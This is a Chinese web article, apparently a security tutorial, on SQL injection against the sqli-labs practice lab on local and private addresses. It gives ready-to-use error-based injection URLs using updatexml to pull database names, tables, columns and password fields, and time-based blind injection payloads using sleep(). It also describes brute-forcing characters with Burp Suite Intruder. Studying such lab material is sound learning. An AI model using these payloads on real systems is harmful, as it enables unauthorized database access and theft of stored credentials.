千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 互联网科技 >

sql注入漏洞报错注入和盲注是怎么样的

发表于:2024-11-20 作者:千家信息网编辑
千家信息网最后更新 2024年11月20日,今天就跟大家聊聊有关 sql注入漏洞报错注入和盲注是怎么样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。环境:sqli的第一关用的szx.p
千家信息网最后更新 2024年11月20日sql注入漏洞报错注入和盲注是怎么样的

今天就跟大家聊聊有关 sql注入漏洞报错注入和盲注是怎么样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

环境:sqli的第一关用的szx.php

一、报错注入

1、获取数据库名称,通过修改limit 后面的值获取不同的数据库名称

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 2,1),1) -- +

2、获取数据库中的表,指定数据库名称,通过修改limit 后面的值获取不同的表名

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 2,1),1) -- +

3、获取表字段,指定表名并转为十六进制形式,通过修改limit 后面的值获取不同的表字段

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、获取字段内容,指定数据库字段和表名称,通过修改limit 后面的值获取不同的字段内容

http://192.168.1.129/sqli/Less-1/?id=1'  and updatexml(1,(select concat(0x7e, pass,0x7e) from jay.user limit 1,1),1) -- +

二、盲注

1、获取数据库长度,如果数据长度大于等于2等待5秒,如果小于2不做任何操作,修改该数值判断数据库长度

http://192.168.1.129/php/szx.php?id=1 and (select (if(length(database())>2,sleep(5),null)))#

2、获取数据库名称

如果数据名称左边第一个是'j',多停留1面,如果不是多停留5秒,修改该字符判断数据库名称

http://192.168.1.129/php/szx.php?id=1 and If(left(database(),1)='j',1,sleep(5))

如果数据名称左边第一个是106,ascii码是'j',多停留1面,如果不是多停留5秒,修改该字符判断数据库名称

http://192.168.1.129/php/szx.php?id=1 and If(ascii(substr(database(),1,1))=106,sleep(1),sleep(5))

三、Burpsuit探测(盲注)

1、抓包发送到Intruder模块,并设置好变量

2、设置payload,ASCII中a-z是97-122,设置步长为1

3、start attack,只有106的时间是2000,其他时间都是5000多,说明第一个位数字的ASCII码是106,依次类推获取其他位置的信息

看完上述内容,你们对 sql注入漏洞报错注入和盲注是怎么样的有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。

很赞哦!
数据 数据库 名称 内容 字段 不同 长度 漏洞 字符 时间 位置 信息 十六进制 变量 只有 形式 数值 数字 更多 模块 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 深圳软金网络技术有限公司 管道管理系统服务器连接失败 长沙移动软件开发价格 数据库设计入门经典数据库特点 潼关专业软件开发 自己架设手游服务器 服务器光模块定做 电脑服务器多少钱一年 qq王者服务器注册上限 黄丽玲调研网络安全感 视易利云服务器 瓜林安可乐在哪个服务器 海康威视嵌入式软件开发工资 林海手机软件开发 通管局网络安全风险通报 软件开发开专票税率 大学生网络安全app 计算机视觉软件开发公司成都 如何将数据库放入缓存 服务器含不含电池 mac 远程连接服务器 服务器硬盘寿命有多大 浙江特色软件开发技术指导 网络技术服务成本分录 服务器系统有几种方法可以安装 数据库case怎么比较 洛阳云端网络技术有限公司 内蒙古时钟监控网管服务器 我爱祖国和网络安全黑板报 网络安全之我见150

相关文章

0